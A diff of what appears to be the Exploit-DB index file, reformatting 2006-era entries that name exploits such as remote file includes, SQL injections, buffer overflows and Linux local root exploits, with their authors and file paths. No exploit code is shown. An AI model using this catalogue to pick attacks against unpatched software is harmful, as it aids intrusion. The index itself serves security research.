+1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 - (visview.php) Remote File Include",2006-06-13,SpC-x,php,webapps,0 1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 - (phpbb_root_path) File Include",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0 1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 @@ -1624,98 +1624,98 @@ id,file,description,date,author,platform,type,port 1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 - (template.php) File Include",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 -1916,platforms/php/webapps/1916.txt,"DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0 -1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit",2006-06-15,c0rrupt,windows,local,0 -1918,platforms/php/webapps/1918.php,"bitweaver <= 1.3 (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 -1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 -1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 -1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0 +1916,platforms/php/webapps/1916.txt,"DeluxeBB <= 1.06 - (templatefolder) Remote File Include Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0 +1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow Exploit",2006-06-15,c0rrupt,windows,local,0 +1918,platforms/php/webapps/1918.php,"bitweaver <= 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 +1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 +1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 - (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 +1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 - (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0 1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 -1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include",2006-06-17,Basti,php,webapps,0 +1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - (ipath) Remote File Include",2006-06-17,Basti,php,webapps,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0 -1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 +1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 - (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 1926,platforms/php/webapps/1926.txt,"PHP Live Helper <= 1.x - (abs_path) Remote File Include",2006-06-18,SnIpEr_SA,php,webapps,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel Unicode Local Overflow Exploit PoC",2006-06-18,kingcope,windows,dos,0 -1928,platforms/php/webapps/1928.txt,"IdeaBox <= 1.1 (gorumDir) Remote File Include",2006-06-19,Kacper,php,webapps,0 -1929,platforms/php/webapps/1929.txt,"Micro CMS <= 0.3.5 (microcms_path) Remote File Include",2006-06-19,CeNGiZ-HaN,php,webapps,0 +1928,platforms/php/webapps/1928.txt,"IdeaBox <= 1.1 - (gorumDir) Remote File Include",2006-06-19,Kacper,php,webapps,0 +1929,platforms/php/webapps/1929.txt,"Micro CMS <= 0.3.5 - (microcms_path) Remote File Include",2006-06-19,CeNGiZ-HaN,php,webapps,0 1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - Remote SQL Injection",2006-06-19,EntriKa,asp,webapps,0 1931,platforms/asp/webapps/1931.txt,"ASP Stats Generator <= 2.1.1 - SQL Injection Vulnerabilities",2006-06-19,"Hamid Ebadi",asp,webapps,0 1932,platforms/php/webapps/1932.php,"Ultimate PHP Board <= 1.96 GOLD - Multiple Vulnerabilities",2006-06-20,"Michael Brooks",php,webapps,0 -1933,platforms/php/webapps/1933.txt,"BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities",2006-06-20,Kw3[R]Ln,php,webapps,0 -1934,platforms/php/webapps/1934.txt,"dotProject <= 2.0.3 (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 +1933,platforms/php/webapps/1933.txt,"BandSite CMS <= 1.1.1 - (root_path) Remote File Include Vulnerabilities",2006-06-20,Kw3[R]Ln,php,webapps,0 +1934,platforms/php/webapps/1934.txt,"dotProject <= 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 1935,platforms/windows/dos/1935.cpp,"Winamp <= 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0 -1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 -1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 +1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 +1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 -1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 +1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 - (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0 -1945,platforms/php/webapps/1945.pl,"w-Agora <= 4.2.0 (inc_dir) Remote File Include Exploit",2006-06-22,the_day,php,webapps,0 -1946,platforms/php/webapps/1946.php,"Jaws <= 0.6.2 (Search gadget) Remote SQL Injection Exploit",2006-06-23,rgod,php,webapps,0 +1945,platforms/php/webapps/1945.pl,"w-Agora <= 4.2.0 - (inc_dir) Remote File Include Exploit",2006-06-22,the_day,php,webapps,0 +1946,platforms/php/webapps/1946.php,"Jaws <= 0.6.2 - (Search gadget) Remote SQL Injection Exploit",2006-06-23,rgod,php,webapps,0 1947,platforms/multiple/dos/1947.c,"BitchX <= 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 -1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 (ROOT_PATH) Remote File Include",2006-06-24,Persian-Defacer,php,webapps,0 -1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0 -1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) <= 1.1.3 (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 +1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Include",2006-06-24,Persian-Defacer,php,webapps,0 +1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0 +1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) <= 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Include",2006-06-25,Kw3[R]Ln,php,webapps,0 -1952,platforms/php/webapps/1952.txt,"THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include",2006-06-25,Kw3[R]Ln,php,webapps,0 -1953,platforms/php/webapps/1953.pl,"DeluxeBB <= 1.07 (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 -1954,platforms/php/webapps/1954.pl,"DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 +1952,platforms/php/webapps/1952.txt,"THoRCMS <= 1.3.1 - (phpbb_root_path) Remote File Include",2006-06-25,Kw3[R]Ln,php,webapps,0 +1953,platforms/php/webapps/1953.pl,"DeluxeBB <= 1.07 - (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 +1954,platforms/php/webapps/1954.pl,"DreamAccount <= 3.1 - (auth.api.php) Remote File Include Exploit",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module <= 1.0 - Remote File Include",2006-06-26,Kw3[R]Ln,php,webapps,0 1956,platforms/php/webapps/1956.txt,"Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities",2006-06-27,Kw3[R]Ln,php,webapps,0 -1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 +1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit <= 1.4.0 - (forumid) Remote SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection",2006-06-28,KeyCoder,php,webapps,0 -1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 +1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 - (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) <= 1.34 - (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0 1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 - Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0 -1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 (dbinstall.php) Remote File Include",2006-07-01,"Hamid Ebadi",php,webapps,0 -1971,platforms/php/webapps/1971.txt,"Randshop <= 1.1.1 (header.inc.php) Remote File Include",2006-07-01,OLiBekaS,php,webapps,0 -1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit",2006-07-01,y3dips,multiple,dos,0 -1973,platforms/osx/local/1973.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)",2006-07-01,"Kevin Finisterre",osx,local,0 -1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 (root) Multiple Remote File Inclusion Vulnerabilities",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 -1975,platforms/php/webapps/1975.pl,"BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit",2006-07-02,x23,php,webapps,0 +1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - (dbinstall.php) Remote File Include",2006-07-01,"Hamid Ebadi",php,webapps,0 +1971,platforms/php/webapps/1971.txt,"Randshop <= 1.1.1 - (header.inc.php) Remote File Include",2006-07-01,OLiBekaS,php,webapps,0 +1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service Exploit",2006-07-01,y3dips,multiple,dos,0 +1973,platforms/osx/local/1973.pl,"Mac OS X <= 10.4.6 - (launchd) Local Format String Exploit (ppc)",2006-07-01,"Kevin Finisterre",osx,local,0 +1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion Vulnerabilities",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 +1975,platforms/php/webapps/1975.pl,"BXCP <= 0.3.0.4 - (where) Remote SQL Injection Exploit",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client CG_ServerCommand() Remote Overflow Exploit",2006-07-02,RunningBon,windows,dos,0 1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client CS_ITEms Remote Overflow Exploit (Win32)",2006-07-02,RunningBon,windows,dos,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel Universal Hlink Local Buffer Overflow Exploit",2006-07-02,"SYS 49152",windows,local,0 -1980,platforms/windows/dos/1980.pl,"ImgSvr <= 0.6.5 (long http post) Denial of Service Exploit",2006-07-04,n00b,windows,dos,0 +1980,platforms/windows/dos/1980.pl,"ImgSvr <= 0.6.5 - (long http post) Denial of Service Exploit",2006-07-04,n00b,windows,dos,0 1981,platforms/php/webapps/1981.txt,"galleria Mambo Module <= 1.0b Remote File Include",2006-07-04,sikunYuk,php,webapps,0 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0 -1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 (domain) Remote File Include",2006-07-05,Kw3[R]Ln,php,webapps,0 -1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0 +1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 - (domain) Remote File Include",2006-07-05,Kw3[R]Ln,php,webapps,0 +1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0 1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0 1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 -1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 (Internet.HHCtrl) Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 +1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - (Internet.HHCtrl) Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 1991,platforms/php/webapps/1991.php,"Pivot <= 1.30 RC2 - Privileges Escalation/Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 -1992,platforms/windows/local/1992.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit (french)",2006-07-07,"Jerome Athias",windows,local,0 +1992,platforms/windows/local/1992.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit (french)",2006-07-07,"Jerome Athias",windows,local,0 1993,platforms/php/webapps/1993.php,"PAPOO <= 3_RC3 SQL Injection/Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component <= 1.1.0 - Remote Include",2006-07-08,h4ntu,php,webapps,0 1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component <= 1.2.4RC3 - Remote Include",2006-07-08,h4ntu,php,webapps,0 -1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include",2006-07-09,A.nosrati,php,webapps,0 +1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO <= 2.2.4 - (pluginpath) Remote File Include",2006-07-09,A.nosrati,php,webapps,0 1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (PHP)",2006-07-09,joffer,multiple,remote,10000 -1998,platforms/php/webapps/1998.pl,"Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 +1998,platforms/php/webapps/1998.pl,"Ottoman CMS <= 1.1.3 - (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC",2006-07-09,"SYS 49152",windows,local,0 2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC",2006-07-10,"Michael Thumann",hardware,dos,0 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0 -2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0 -2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 +2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0 +2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0 2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0 -2007,platforms/php/webapps/2007.php,"phpBB 3 (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0 -2008,platforms/php/webapps/2008.php,"Phorum 5 (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 -2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 +2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0 +2008,platforms/php/webapps/2008.php,"Phorum 5 - (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 +2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0 2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0 @@ -1724,8 +1724,8 @@ id,file,description,date,author,platform,type,port 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (Perl)",2006-07-15,UmZ,multiple,remote,10000 -2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion",2006-07-16,igi,php,webapps,0 -2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulnerabilities",2006-07-17,OLiBekaS,php,webapps,0 +2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 - (class.rich.php) Remote Inclusion",2006-07-16,igi,php,webapps,0 +2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 - (m2f_root_path) Remote Include Vulnerabilities",2006-07-17,OLiBekaS,php,webapps,0 2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component <= 0.3en Remote Include",2006-07-17,h4ntu,php,webapps,0 2021,platforms/php/webapps/2021.txt,"SMF Forum Mambo Component <= 1.3.1.3 Include",2006-07-17,ASIANEAGLE,php,webapps,0 2022,platforms/php/webapps/2022.txt,"com_extcalendar Mambo Component <= 2.0 Include",2006-07-17,OLiBekaS,php,webapps,0 @@ -1743,222 +1743,222 @@ id,file,description,date,author,platform,type,port 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0 2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0 -2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0 -2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 -2046,platforms/php/webapps/2046.txt,"iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 -2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit",2006-07-20,"Jacopo Cervini",windows,remote,0 -2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 (JBoss) Remote Code Execution Exploit",2006-07-20,"Jon Hart",hardware,remote,0 -2049,platforms/php/webapps/2049.txt,"SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include",2006-07-20,Aesthetico,php,webapps,0 -2050,platforms/php/webapps/2050.php,"LoudBlog <= 0.5 (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 +2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 - (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0 +2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 +2046,platforms/php/webapps/2046.txt,"iManage CMS <= 4.0.12 - (absolute_path) Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 +2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server <= 1.01 - (LIST) Remote Buffer Overflow Exploit",2006-07-20,"Jacopo Cervini",windows,remote,0 +2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - (JBoss) Remote Code Execution Exploit",2006-07-20,"Jon Hart",hardware,remote,0 +2049,platforms/php/webapps/2049.txt,"SiteDepth CMS <= 3.0.1 - (SD_DIR) Remote File Include",2006-07-20,Aesthetico,php,webapps,0 +2050,platforms/php/webapps/2050.php,"LoudBlog <= 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0 2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0 -2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110 +2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0 -2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 +2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 -2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 (help.php) Remote Inclusion",2006-07-23,magnific,php,webapps,0 +2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 - (help.php) Remote Inclusion",2006-07-23,magnific,php,webapps,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component <= 18RC1 - Remote Include",2006-07-23,"Kurdish Security",php,webapps,0 -2063,platforms/php/webapps/2063.txt,"ArticlesOne <= 07232006 (page) Remote Include",2006-07-23,CyberLord,php,webapps,0 +2063,platforms/php/webapps/2063.txt,"ArticlesOne <= 07232006 - (page) Remote Include",2006-07-23,CyberLord,php,webapps,0 2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha Remote Inclusion",2006-07-23,jank0,php,webapps,0 2065,platforms/windows/local/2065.c,"Cheese Tracker <= 0.9.9 - Local Buffer Overflow Exploit PoC",2006-07-23,"Luigi Auriemma",windows,local,0 2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component <= 1.0.1 - Remote Inclusion",2006-07-23,Blue|Spy,php,webapps,0 2067,platforms/solaris/local/2067.c,"Solaris <= 10 - sysinfo() Local Kernel Memory Disclosure Exploit",2006-07-24,prdelka,solaris,local,0 -2068,platforms/php/webapps/2068.php,"X7 Chat <= 2.0.4 (old_prefix) Remote Blind SQL Injection Exploit",2006-07-24,rgod,php,webapps,0 +2068,platforms/php/webapps/2068.php,"X7 Chat <= 2.0.4 - (old_prefix) Remote Blind SQL Injection Exploit",2006-07-24,rgod,php,webapps,0 2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com <= 0.8 - Remote Inclusion",2006-07-24,OLiBekaS,php,webapps,0 